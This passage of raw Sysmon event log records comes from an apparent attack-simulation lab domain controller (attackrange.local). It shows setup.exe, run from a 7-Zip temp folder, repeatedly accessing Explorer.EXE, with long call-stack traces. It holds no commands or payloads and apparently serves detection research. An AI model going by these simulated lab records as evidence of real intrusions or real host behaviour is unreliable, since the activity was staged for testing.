ows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.864{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
